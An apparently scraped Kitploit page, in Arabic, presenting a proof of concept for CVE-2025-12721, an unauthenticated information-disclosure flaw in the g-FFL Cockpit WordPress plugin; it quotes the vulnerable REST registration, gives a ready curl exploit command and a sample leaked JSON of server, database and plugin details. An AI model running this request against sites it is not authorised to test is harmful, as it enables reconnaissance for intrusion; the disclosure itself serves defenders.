Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-12721 — g-FFL Cockpit <= 1.7.1 - غياب التفويض يؤدي إلى كشف معلومات دون مصادقة | Kitploit
أدوات/GitHubGitHub/d0n601/cve-2025-12721
تحليل الثغرات الأمنيةالاستغلالجمع المعلوماتأمن الويباختبار الاختراقسوء التكوين
GitHubd0n601/cve-2025-12721

CVE-2025-12721

g-FFL Cockpit <= 1.7.1 - غياب التفويض يؤدي إلى كشف معلومات دون مصادقة

عرض المستودع
منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

g-FFL Cockpit <= 1.7.1 - كشف معلومات غير مصادق عليه

لا يقوم ملحق g-FFL Cockpit بتنفيذ عمليات تحقق صحيحة من الصلاحيات على نقطة نهاية REST API الخاصة بـ server_status، مما يسمح للمستخدمين غير المصادق عليهم بالوصول إلى معلومات حساسة حول تكوين الخادم وإعدادات PHP وتفاصيل قاعدة البيانات وبيانات تثبيت WordPress ومعلومات الملحقات النشطة عبر نقطة نهاية عامة مكشوفة.

استغلال سريع (TL;DR)

root@kitploit:~
TARGET_SITE="http://example.com"
curl -X GET $TARGET_SITE/wp-json/fflcockpit/v1/server_status | jq

التفاصيل

تسترد الدالة handle_server_status() الموجودة في includes/class-sync-endpoint.php معلومات شاملة عن الخادم وتعرضها دون اشتراط أي مصادقة أو فحوصات صلاحيات. يتم تسجيل نقطة النهاية مع permission_callback => '__return_true'، مما يجعلها في متناول أي زائر غير مصادق عليه تمامًا.

موجودة في class-sync-endpoint.php:

root@kitploit:~
88:        register_rest_route('fflcockpit/v1', '/server_status', [
89:            'methods' => 'GET',
90:            'callback' => [__CLASS__, 'handle_server_status'],
91:            'permission_callback' => '__return_true', // Public endpoint
92:        ]);

تكشف الدالة handle_server_status() عن:

  • معلومات الخادم: إصدار PHP، نظام التشغيل، برمجيات الخادم، البنية، حمل الخادم
  • استخدام الذاكرة: الاستخدام الحالي للذاكرة، الذروة، حدود الذاكرة، نسب الاستخدام
  • إعدادات PHP: حد الذاكرة، حدود وقت التنفيذ، حدود الرفع، الحد الأقصى لمتغيرات الإدخال، حالة OPcache
  • ملحقات PHP: حالة الملحقات المُحمّلة (curl, gd, imagick, mbstring, mysql, zip, xml, json, openssl, fileinfo)
  • معلومات قاعدة البيانات: إصدار MySQL، ترميز/ترتيب قاعدة البيانات، متغيرات إعداد MySQL، حجم قاعدة البيانات، عدد الاستعلامات
  • مساحة القرص: المساحة الحرة والإجمالية، نسب الاستخدام
  • معلومات WordPress: إصدار WordPress، حالة الشبكة المتعددة (multisite)، حالة وضع التصحيح، قائمة الملحقات النشطة مع الإصدارات والمؤلفين
  • معلومات WooCommerce: حالة التثبيت، الإصدار، إعدادات API، أعداد المنتجات/الطلبات، إعداد معالج الجلسات
  • مؤشرات الأداء: عتبات الذاكرة، فحوصات وقت التنفيذ، حالة OPcache، تحذيرات مساحة القرص، تحليل إعداد MySQL

مقتطف برمجي قابل للاستغلال من class-sync-endpoint.php:

root@kitploit:~
1443:                'php_version' => phpversion(),
1444:                'operating_system' => defined('PHP_OS') ? PHP_OS : 'Unknown',
1445:            ];
1446:            
1447:            if (isset($_SERVER['SERVER_SOFTWARE'])) {
1448:                $server_info['server_software'] = $_SERVER['SERVER_SOFTWARE'];
1449:            }

كشف إضافي في class-sync-endpoint.php:

root@kitploit:~
1645:                $active_plugins_list = get_option('active_plugins', []);
1646:                $wp_info['active_plugins_count'] = count($active_plugins_list);
1647:                
1648:                if (!function_exists('get_plugins')) {
1649:                    require_once ABSPATH . 'wp-admin/includes/plugin.php';
1650:                }
1651:                $all_plugins = get_plugins();
1652:                
1653:                $plugin_details = [];
1654:                foreach ($active_plugins_list as $plugin_path) {
1655:                    if (isset($all_plugins[$plugin_path])) {
1656:                        $plugin_info = $all_plugins[$plugin_path];
1657:                        $plugin_details[] = [
1658:                            'name' => $plugin_info['Name'] ?? 'Unknown',
1659:                            'version' => $plugin_info['Version'] ?? 'Unknown',
1660:                            'author' => isset($plugin_info['Author']) ? strip_tags($plugin_info['Author']) : 'Unknown',
1661:                            'description' => isset($plugin_info['Description']) ? wp_trim_words(strip_tags($plugin_info['Description']), 20) : '',
1662:                            'path' => $plugin_path,
1663:                            'network' => $plugin_info['Network'] ?? false,
1664:                        ];
1665:                    }
1666:                }

إعادة الإنتاج يدويًا

ملاحظة: يتطلب g-FFL Cockpit وجود WooCommerce

  1. انتقل إلى موقع WordPress المستهدف المثبت عليه ملحق g-FFL Cockpit.

  2. نفّذ أمر curl التالي لاسترداد معلومات حالة الخادم:

root@kitploit:~
curl -X GET http://example.com/wp-json/fflcockpit/v1/server_status
  1. ستتلقى استجابة JSON تحتوي على تكوين شامل للخادم وإعدادات PHP ومعلومات قاعدة البيانات وتفاصيل WordPress وWooCommerce وقائمة كاملة بالملحقات النشطة:
root@kitploit:~
{
  "plugin": {
    "name": "FFL Cockpit",
    "version": "1.7.1"
  },
  "timestamp": "2024-01-15T12:34:56Z",
  "server": {
    "php_version": "8.1.27",
    "operating_system": "Linux",
    "server_software": "Apache/2.4.57",
    "architecture": "x86_64",
    "server_load": [0.52, 0.48, 0.45]
  },
  "memory_usage": {
    "current": "45.23 MB",
    "current_bytes": 47415296,
    "peak": "52.18 MB",
    "peak_bytes": 54722560,
    "limit": "256 MB",
    "limit_bytes": 268435456,
    "usage_percentage": 17.67
  },
  "php_config": {
    "memory_limit": "256M",
    "max_execution_time": "300",
    "max_input_vars": "3000",
    "post_max_size": "64M",
    "upload_max_filesize": "64M",
    "max_file_uploads": "20",
    "opcache_enabled": true,
    "opcache_memory_consumption": 67108864,
    "opcache_hit_rate": 95.23
  },
  "php_extensions": {
    "curl": true,
    "gd": true,
    "imagick": true,
    "mbstring": true,
    "mysql": true,
    "zip": true,
    "xml": true,
    "json": true,
    "openssl": true,
    "fileinfo": true
  },
  "database": {
    "mysql_version": "8.0.35",
    "charset": "utf8mb4",
    "collate": "utf8mb4_unicode_ci",
    "queries_this_request": 42,
    "mysql_config": {
      "max_connections": "151",
      "max_allowed_packet": "67108864",
      "innodb_buffer_pool_size": "134217728"
    },
    "database_size": 125.43
  },
  "disk_space": {
    "free": "15.23 GB",
    "free_bytes": 16357785600,
    "total": "50.00 GB",
    "total_bytes": 53687091200,
    "used_percentage": 69.51
  },
  "wordpress": {
    "version": "6.4.2",
    "multisite": false,
    "debug_enabled": false,
    "cache_enabled": false,
    "active_plugins_count": 12,
    "active_plugins": [
      {
        "name": "g-FFL Cockpit",
        "version": "1.7.1",
        "author": "Garidium LLC",
        "description": "g-FFL Cockpit",
        "path": "g-ffl-cockpit/g-ffl-cockpit.php",
        "network": false
      }
    ]
  },
  "woocommerce": {
    "is_installed": true,
    "version": "8.5.2",
    "api_enabled": true,
    "product_count": 1250,
    "order_count": 342
  }
}
تنزيل الأداة